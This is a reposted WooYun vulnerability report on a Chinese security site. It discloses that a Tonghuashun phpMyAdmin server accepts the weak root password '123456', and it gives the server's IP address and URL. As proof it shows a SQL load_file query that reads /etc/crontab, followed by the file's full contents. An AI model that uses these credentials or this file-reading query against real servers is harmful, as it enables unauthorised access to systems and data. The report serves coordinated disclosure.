神刀安全网

漏洞标题: 同花顺某phpMyAdmin存在root弱口令

漏洞详情

披露状态:

2016-04-28: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

同花顺某phpMyAdmin存在root弱口令

详细说明:

http://183.131.12.139:81/phpmyadmin/

root

123456

/hxapp/hqserver/ 同花顺行情服务器的标志

漏洞证明:

select load_file('/etc/crontab');

code 区域
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root ntpdate ntp1.nl.net >/dev/null 2>&1
*/3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh > /dev/nul
*/1 * * * * root sh /home/l2log/update_log.sh > /dev/nul
*/1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh > /dev/nul
00 17 * * * root sh /home/lossreport/loss_report.sh >/dev/null 2>&1
##00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh >/dev/null 2>&1
*/1 * * * * root sh /home/netcheck/netcheck_log.sh >/dev/null 2>&1
##*/1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh > /dev/nul
#* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh >> /tmp/a.txt 2>&1
#00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh > /dev/null
00 22 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
25 17 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
00 09 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul
*/5 22-23 * * 1-5 root sh /home/arping/arping.sh > /dev/nul
#*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh >/dev/null 2>&1
59 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am
#*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh >/dev/null 2>&1
##59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh >/dev/null
##59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh >/dev/null
#45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045
##* * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh
#*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh
* * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh
*/5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh
00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh
*/5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh >/dev/null 2>&1
*/30 * * * * root sh /usr/local/nagios/libexec/check_poller_disk > /dev/null
00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh >/dev/null 2>&1

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 同花顺某phpMyAdmin存在root弱口令

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址